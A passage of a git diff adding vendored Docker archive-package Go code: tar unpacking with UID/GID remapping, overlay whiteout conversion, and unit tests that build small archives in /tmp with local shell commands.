We only perform this mapping if + // the file isn't already owned by the remapped root UID or GID, as + // that specific uid/gid has no mapping from container -> host, and + // those files already have the proper ownership for inside the + // container. + if hdr.Uid != remappedRootUID { + xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + } + if hdr.Gid != remappedRootGID { + xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps) + if err != nil { + return err + } + hdr.Gid = xGID + } + + if whiteoutConverter != nil { + writeFile, err := whiteoutConverter.ConvertRead(hdr, path) + if err != nil { + return err + } + if !writeFile { + continue + } + } + + if err := createTarFile(path, dest, hdr, trBuf, !options.NoLchown, options.ChownOpts, options.InUserNS); err != nil { + return err + } + + // Directory mtimes must be handled at the end to avoid further + // file creation in them to modify the directory mtime + if hdr.Typeflag == tar.TypeDir { + dirs = append(dirs, hdr) + } + } + + for _, hdr := range dirs { + path := filepath.Join(dest, hdr.Name) + + if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil { + return err + } + } + return nil +} + +// Untar reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive may be compressed with one of the following algorithms: +// identity (uncompressed), gzip, bzip2, xz. +// FIXME: specify behavior when target path exists vs. doesn't exist. +func Untar(tarArchive io.Reader, dest string, options *TarOptions) error { + return untarHandler(tarArchive, dest, options, true) +} + +// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive must be an uncompressed stream. 
+func UntarUncompressed(tarArchive io.Reader, dest string, options *TarOptions) error { + return untarHandler(tarArchive, dest, options, false) +} + +// Handler for teasing out the automatic decompression +func untarHandler(tarArchive io.Reader, dest string, options *TarOptions, decompress bool) error { + if tarArchive == nil { + return fmt.Errorf("Empty archive") + } + dest = filepath.Clean(dest) + if options == nil { + options = &TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + r := tarArchive + if decompress { + decompressedArchive, err := DecompressStream(tarArchive) + if err != nil { + return err + } + defer decompressedArchive.Close() + r = decompressedArchive + } + + return Unpack(r, dest, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func (archiver *Archiver) TarUntar(src, dst string) error { + logrus.Debugf("TarUntar(%s %s)", src, dst) + archive, err := TarWithOptions(src, &TarOptions{Compression: Uncompressed}) + if err != nil { + return err + } + defer archive.Close() + + var options *TarOptions + if archiver.UIDMaps != nil || archiver.GIDMaps != nil { + options = &TarOptions{ + UIDMaps: archiver.UIDMaps, + GIDMaps: archiver.GIDMaps, + } + } + return archiver.Untar(archive, dst, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func TarUntar(src, dst string) error { + return defaultArchiver.TarUntar(src, dst) +} + +// UntarPath untar a file from path to a destination, src is the source tar file path. 
+func (archiver *Archiver) UntarPath(src, dst string) error { + archive, err := os.Open(src) + if err != nil { + return err + } + defer archive.Close() + var options *TarOptions + if archiver.UIDMaps != nil || archiver.GIDMaps != nil { + options = &TarOptions{ + UIDMaps: archiver.UIDMaps, + GIDMaps: archiver.GIDMaps, + } + } + return archiver.Untar(archive, dst, options) +} + +// UntarPath is a convenience function which looks for an archive +// at filesystem path `src`, and unpacks it at `dst`. +func UntarPath(src, dst string) error { + return defaultArchiver.UntarPath(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func (archiver *Archiver) CopyWithTar(src, dst string) error { + srcSt, err := os.Stat(src) + if err != nil { + return err + } + if !srcSt.IsDir() { + return archiver.CopyFileWithTar(src, dst) + } + + // if this archiver is set up with ID mapping we need to create + // the new destination directory with the remapped root UID/GID pair + // as owner + rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) + if err != nil { + return err + } + // Create dst, copy src's content into it + logrus.Debugf("Creating dest directory: %s", dst) + if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil { + return err + } + logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) + return archiver.TarUntar(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func CopyWithTar(src, dst string) error { + return defaultArchiver.CopyWithTar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. 
It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { + logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst) + srcSt, err := os.Stat(src) + if err != nil { + return err + } + + if srcSt.IsDir() { + return fmt.Errorf("Can't copy a directory") + } + + // Clean up the trailing slash. This must be done in an operating + // system specific manner. + if dst[len(dst)-1] == os.PathSeparator { + dst = filepath.Join(dst, filepath.Base(src)) + } + // Create the holding directory if necessary + if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil { + return err + } + + r, w := io.Pipe() + errC := promise.Go(func() error { + defer w.Close() + + srcF, err := os.Open(src) + if err != nil { + return err + } + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") + if err != nil { + return err + } + hdr.Name = filepath.Base(dst) + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) + if err != nil { + return err + } + + // only perform mapping if the file being copied isn't already owned by the + // uid or gid of the remapped root in the container + if remappedRootUID != hdr.Uid { + xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + } + if remappedRootGID != hdr.Gid { + xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps) + if err != nil { + return err + } + hdr.Gid = xGID + } + + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }) + defer func() { + if er := <-errC; err == nil && er != nil { + err = er + } + }() + + err = archiver.Untar(r, filepath.Dir(dst), nil) + if err != nil { + r.CloseWithError(err) + } + return err +} + +// CopyFileWithTar emulates 
the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +// +// Destination handling is in an operating specific manner depending +// where the daemon is running. If `dst` ends with a trailing slash +// the final destination path will be `dst/base(src)` (Linux) or +// `dst\base(src)` (Windows). +func CopyFileWithTar(src, dst string) (err error) { + return defaultArchiver.CopyFileWithTar(src, dst) +} + +// cmdStream executes a command, and returns its stdout as a stream. +// If the command fails to run or doesn't complete successfully, an error +// will be returned, including anything written on stderr. +func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) { + chdone := make(chan struct{}) + cmd.Stdin = input + pipeR, pipeW := io.Pipe() + cmd.Stdout = pipeW + var errBuf bytes.Buffer + cmd.Stderr = &errBuf + + // Run the command and return the pipe + if err := cmd.Start(); err != nil { + return nil, nil, err + } + + // Copy stdout to the returned pipe + go func() { + if err := cmd.Wait(); err != nil { + pipeW.CloseWithError(fmt.Errorf("%s: %s", err, errBuf.String())) + } else { + pipeW.Close() + } + close(chdone) + }() + + return pipeR, chdone, nil +} + +// NewTempArchive reads the content of src into a temporary file, and returns the contents +// of that file as an archive. The archive can only be read once - as soon as reading completes, +// the file will be deleted. +func NewTempArchive(src io.Reader, dir string) (*TempArchive, error) { + f, err := ioutil.TempFile(dir, "") + if err != nil { + return nil, err + } + if _, err := io.Copy(f, src); err != nil { + return nil, err + } + if _, err := f.Seek(0, 0); err != nil { + return nil, err + } + st, err := f.Stat() + if err != nil { + return nil, err + } + size := st.Size() + return &TempArchive{File: f, Size: size}, nil +} + +// TempArchive is a temporary archive. 
The archive can only be read once - as soon as reading completes, +// the file will be deleted. +type TempArchive struct { + *os.File + Size int64 // Pre-computed from Stat().Size() as a convenience + read int64 + closed bool +} + +// Close closes the underlying file if it's still open, or does a no-op +// to allow callers to try to close the TempArchive multiple times safely. +func (archive *TempArchive) Close() error { + if archive.closed { + return nil + } + + archive.closed = true + + return archive.File.Close() +} + +func (archive *TempArchive) Read(data []byte) (int, error) { + n, err := archive.File.Read(data) + archive.read += int64(n) + if err != nil || archive.read == archive.Size { + archive.Close() + os.Remove(archive.File.Name()) + } + return n, err +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go new file mode 100644 index 0000000000..6b2a31ff1f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go @@ -0,0 +1,95 @@ +package archive + +import ( + "archive/tar" + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/system" +) + +func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { + if format == OverlayWhiteoutFormat { + return overlayWhiteoutConverter{} + } + return nil +} + +type overlayWhiteoutConverter struct{} + +func (overlayWhiteoutConverter) ConvertWrite(hdr *tar.Header, path string, fi os.FileInfo) (wo *tar.Header, err error) { + // convert whiteouts to AUFS format + if fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0 { + // we just rename the file and make it normal + dir, filename := filepath.Split(hdr.Name) + hdr.Name = filepath.Join(dir, WhiteoutPrefix+filename) + hdr.Mode = 0600 + hdr.Typeflag = tar.TypeReg + hdr.Size = 0 + } + + if fi.Mode()&os.ModeDir != 0 { + // convert opaque dirs to AUFS format by writing an empty file with the prefix + opaque, 
err := system.Lgetxattr(path, "trusted.overlay.opaque") + if err != nil { + return nil, err + } + if len(opaque) == 1 && opaque[0] == 'y' { + if hdr.Xattrs != nil { + delete(hdr.Xattrs, "trusted.overlay.opaque") + } + + // create a header for the whiteout file + // it should inherit some properties from the parent, but be a regular file + wo = &tar.Header{ + Typeflag: tar.TypeReg, + Mode: hdr.Mode & int64(os.ModePerm), + Name: filepath.Join(hdr.Name, WhiteoutOpaqueDir), + Size: 0, + Uid: hdr.Uid, + Uname: hdr.Uname, + Gid: hdr.Gid, + Gname: hdr.Gname, + AccessTime: hdr.AccessTime, + ChangeTime: hdr.ChangeTime, + } + } + } + + return +} + +func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, error) { + base := filepath.Base(path) + dir := filepath.Dir(path) + + // if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay + if base == WhiteoutOpaqueDir { + if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil { + return false, err + } + + // don't write the file itself + return false, nil + } + + // if a file was deleted and we are using overlay, we need to create a character device + if strings.HasPrefix(base, WhiteoutPrefix) { + originalBase := base[len(WhiteoutPrefix):] + originalPath := filepath.Join(dir, originalBase) + + if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil { + return false, err + } + if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil { + return false, err + } + + // don't write the file itself + return false, nil + } + + return true, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go new file mode 100644 index 0000000000..d5f046e9df --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go @@ -0,0 +1,187 @@ +package archive + +import ( + "io/ioutil" + "os" + "path/filepath" + "syscall" + 
"testing" + + "github.com/docker/docker/pkg/system" +) + +// setupOverlayTestDir creates files in a directory with overlay whiteouts +// Tree layout +// . +// ├── d1 # opaque, 0700 +// │   └── f1 # empty file, 0600 +// ├── d2 # opaque, 0750 +// │   └── f1 # empty file, 0660 +// └── d3 # 0700 +// └── f1 # whiteout, 0644 +func setupOverlayTestDir(t *testing.T, src string) { + // Create opaque directory containing single file and permission 0700 + if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil { + t.Fatal(err) + } + + if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil { + t.Fatal(err) + } + + // Create another opaque directory containing single file but with permission 0750 + if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil { + t.Fatal(err) + } + + if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil { + t.Fatal(err) + } + + // Create regular directory with deleted file + if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil { + t.Fatal(err) + } + + if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil { + t.Fatal(err) + } +} + +func checkOpaqueness(t *testing.T, path string, opaque string) { + xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque") + if err != nil { + t.Fatal(err) + } + if string(xattrOpaque) != opaque { + t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque) + } + +} + +func checkOverlayWhiteout(t *testing.T, path string) { + stat, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if !ok { + t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", 
stat.Sys()) + } + if statT.Rdev != 0 { + t.Fatalf("Non-zero device number for whiteout") + } +} + +func checkFileMode(t *testing.T, path string, perm os.FileMode) { + stat, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if stat.Mode() != perm { + t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm) + } +} + +func TestOverlayTarUntar(t *testing.T) { + oldmask, err := system.Umask(0) + if err != nil { + t.Fatal(err) + } + defer system.Umask(oldmask) + + src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + + setupOverlayTestDir(t, src) + + dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + + options := &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: OverlayWhiteoutFormat, + } + archive, err := TarWithOptions(src, options) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + if err := Untar(archive, dst, options); err != nil { + t.Fatal(err) + } + + checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600) + checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660) + checkFileMode(t, filepath.Join(dst, "d3", "f1"), os.ModeCharDevice|os.ModeDevice) + + checkOpaqueness(t, filepath.Join(dst, "d1"), "y") + checkOpaqueness(t, filepath.Join(dst, "d2"), "y") + checkOpaqueness(t, filepath.Join(dst, "d3"), "") + checkOverlayWhiteout(t, filepath.Join(dst, "d3", "f1")) +} + +func TestOverlayTarAUFSUntar(t *testing.T) { + oldmask, err := system.Umask(0) + if err != nil { + t.Fatal(err) + } + defer system.Umask(oldmask) + + src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + + setupOverlayTestDir(t, src) + + dst, err := 
ioutil.TempDir("", "docker-test-overlay-tar-dst") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + + archive, err := TarWithOptions(src, &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: OverlayWhiteoutFormat, + }) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + if err := Untar(archive, dst, &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: AUFSWhiteoutFormat, + }); err != nil { + t.Fatal(err) + } + + checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700) + checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d2", WhiteoutOpaqueDir), 0750) + checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600) + checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660) + checkFileMode(t, filepath.Join(dst, "d3", WhiteoutPrefix+"f1"), 0600) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go new file mode 100644 index 0000000000..54acbf2856 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go @@ -0,0 +1,7 @@ +// +build !linux + +package archive + +func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go new file mode 100644 index 0000000000..b883be33ed --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go @@ -0,0 +1,1162 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + "time" +) + +var tmp string + +func init() { + tmp = "/tmp/" + if runtime.GOOS == "windows" { + tmp = os.Getenv("TEMP") + `\` + } +} + +func TestIsArchiveNilHeader(t 
*testing.T) { + out := IsArchive(nil) + if out { + t.Fatalf("isArchive should return false as nil is not a valid archive header") + } +} + +func TestIsArchiveInvalidHeader(t *testing.T) { + header := []byte{0x00, 0x01, 0x02} + out := IsArchive(header) + if out { + t.Fatalf("isArchive should return false as %s is not a valid archive header", header) + } +} + +func TestIsArchiveBzip2(t *testing.T) { + header := []byte{0x42, 0x5A, 0x68} + out := IsArchive(header) + if !out { + t.Fatalf("isArchive should return true as %s is a bz2 header", header) + } +} + +func TestIsArchive7zip(t *testing.T) { + header := []byte{0x50, 0x4b, 0x03, 0x04} + out := IsArchive(header) + if out { + t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header) + } +} + +func TestIsArchivePathDir(t *testing.T) { + cmd := exec.Command("sh", "-c", "mkdir -p /tmp/archivedir") + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if IsArchivePath(tmp + "archivedir") { + t.Fatalf("Incorrectly recognised directory as an archive") + } +} + +func TestIsArchivePathInvalidFile(t *testing.T) { + cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1024 count=1 of=/tmp/archive && gzip --stdout /tmp/archive > /tmp/archive.gz") + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if IsArchivePath(tmp + "archive") { + t.Fatalf("Incorrectly recognised invalid tar path as archive") + } + if IsArchivePath(tmp + "archive.gz") { + t.Fatalf("Incorrectly recognised invalid compressed tar path as archive") + } +} + +func TestIsArchivePathTar(t *testing.T) { + var whichTar string + if runtime.GOOS == "solaris" { + whichTar = "gtar" + } else { + whichTar = "tar" + } + cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar) + cmd := 
exec.Command("sh", "-c", cmdStr) + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if !IsArchivePath(tmp + "/archive") { + t.Fatalf("Did not recognise valid tar path as archive") + } + if !IsArchivePath(tmp + "archive.gz") { + t.Fatalf("Did not recognise valid compressed tar path as archive") + } +} + +func testDecompressStream(t *testing.T, ext, compressCommand string) { + cmd := exec.Command("sh", "-c", + fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand)) + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Failed to create an archive file for test : %s.", output) + } + filename := "archive." + ext + archive, err := os.Open(tmp + filename) + if err != nil { + t.Fatalf("Failed to open file %s: %v", filename, err) + } + defer archive.Close() + + r, err := DecompressStream(archive) + if err != nil { + t.Fatalf("Failed to decompress %s: %v", filename, err) + } + if _, err = ioutil.ReadAll(r); err != nil { + t.Fatalf("Failed to read the decompressed stream: %v ", err) + } + if err = r.Close(); err != nil { + t.Fatalf("Failed to close the decompressed stream: %v ", err) + } +} + +func TestDecompressStreamGzip(t *testing.T) { + testDecompressStream(t, "gz", "gzip -f") +} + +func TestDecompressStreamBzip2(t *testing.T) { + testDecompressStream(t, "bz2", "bzip2 -f") +} + +func TestDecompressStreamXz(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("Xz not present in msys2") + } + testDecompressStream(t, "xz", "xz -f") +} + +func TestCompressStreamXzUnsuported(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, Xz) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestCompressStreamBzip2Unsupported(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != nil { 
+ t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, Xz) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestCompressStreamInvalid(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, -1) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestExtensionInvalid(t *testing.T) { + compression := Compression(-1) + output := compression.Extension() + if output != "" { + t.Fatalf("The extension of an invalid compression should be an empty string.") + } +} + +func TestExtensionUncompressed(t *testing.T) { + compression := Uncompressed + output := compression.Extension() + if output != "tar" { + t.Fatalf("The extension of an uncompressed archive should be 'tar'.") + } +} +func TestExtensionBzip2(t *testing.T) { + compression := Bzip2 + output := compression.Extension() + if output != "tar.bz2" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.bz2'") + } +} +func TestExtensionGzip(t *testing.T) { + compression := Gzip + output := compression.Extension() + if output != "tar.gz" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'") + } +} +func TestExtensionXz(t *testing.T) { + compression := Xz + output := compression.Extension() + if output != "tar.xz" { + t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'") + } +} + +func TestCmdStreamLargeStderr(t *testing.T) { + cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello") + out, _, err := cmdStream(cmd, nil) + if err != nil { + t.Fatalf("Failed to start command: %s", err) + } + errCh := make(chan error) + go func() { + _, err := io.Copy(ioutil.Discard, out) + errCh <- err + }() + select { + case err := <-errCh: + if err != nil { + t.Fatalf("Command should not have 
failed (err=%.100s...)", err) + } + case <-time.After(5 * time.Second): + t.Fatalf("Command did not complete in 5 seconds; probable deadlock") + } +} + +func TestCmdStreamBad(t *testing.T) { + // TODO Windows: Figure out why this is failing in CI but not locally + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows CI machines") + } + badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1") + out, _, err := cmdStream(badCmd, nil) + if err != nil { + t.Fatalf("Failed to start command: %s", err) + } + if output, err := ioutil.ReadAll(out); err == nil { + t.Fatalf("Command should have failed") + } else if err.Error() != "exit status 1: error couldn't reverse the phase pulser\n" { + t.Fatalf("Wrong error value (%s)", err) + } else if s := string(output); s != "hello\n" { + t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output) + } +} + +func TestCmdStreamGood(t *testing.T) { + cmd := exec.Command("sh", "-c", "echo hello; exit 0") + out, _, err := cmdStream(cmd, nil) + if err != nil { + t.Fatal(err) + } + if output, err := ioutil.ReadAll(out); err != nil { + t.Fatalf("Command should not have failed (err=%s)", err) + } else if s := string(output); s != "hello\n" { + t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output) + } +} + +func TestUntarPathWithInvalidDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + invalidDestFolder := filepath.Join(tempFolder, "invalidDest") + // Create a src file + srcFile := filepath.Join(tempFolder, "src") + tarFile := filepath.Join(tempFolder, "src.tar") + os.Create(srcFile) + os.Create(invalidDestFolder) // being a file (not dir) should cause an error + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + 
filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + err = UntarPath(tarFile, invalidDestFolder) + if err == nil { + t.Fatalf("UntarPath with invalid destination path should throw an error.") + } +} + +func TestUntarPathWithInvalidSrc(t *testing.T) { + dest, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer os.RemoveAll(dest) + err = UntarPath("/invalid/path", dest) + if err == nil { + t.Fatalf("UntarPath with invalid src path should throw an error.") + } +} + +func TestUntarPath(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(filepath.Join(tmpFolder, "src")) + + destFolder := filepath.Join(tmpFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatalf("Fail to create the destination file") + } + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + + err = UntarPath(tarFile, destFolder) + if err != nil { + t.Fatalf("UntarPath shouldn't throw an error, %s.", err) + } + expectedFile := filepath.Join(destFolder, srcFileU) + _, err = os.Stat(expectedFile) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +// Do the same test as 
above but with the destination as file, it should fail +func TestUntarPathWithDestinationFile(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(filepath.Join(tmpFolder, "src")) + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + destFile := filepath.Join(tmpFolder, "dest") + _, err = os.Create(destFile) + if err != nil { + t.Fatalf("Fail to create the destination file") + } + err = UntarPath(tarFile, destFile) + if err == nil { + t.Fatalf("UntarPath should throw an error if the destination if a file") + } +} + +// Do the same test as above but with the destination folder already exists +// and the destination file is a directory +// It's working, see https://github.com/docker/docker/issues/10040 +func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) { + tmpFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpFolder) + srcFile := filepath.Join(tmpFolder, "src") + tarFile := filepath.Join(tmpFolder, "src.tar") + os.Create(srcFile) + + // Translate back to Unix semantics as next exec.Command is run under sh + srcFileU := srcFile + tarFileU := tarFile + if runtime.GOOS == "windows" { + tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar" + srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src" + } + + cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) + _, err = 
cmd.CombinedOutput() + if err != nil { + t.Fatal(err) + } + destFolder := filepath.Join(tmpFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatalf("Fail to create the destination folder") + } + // Let's create a folder that will has the same path as the extracted file (from tar) + destSrcFileAsFolder := filepath.Join(destFolder, srcFileU) + err = os.MkdirAll(destSrcFileAsFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = UntarPath(tarFile, destFolder) + if err != nil { + t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder") + } +} + +func TestCopyWithTarInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + destFolder := filepath.Join(tempFolder, "dest") + invalidSrc := filepath.Join(tempFolder, "doesnotexists") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyWithTar(invalidSrc, destFolder) + if err == nil { + t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") + } +} + +func 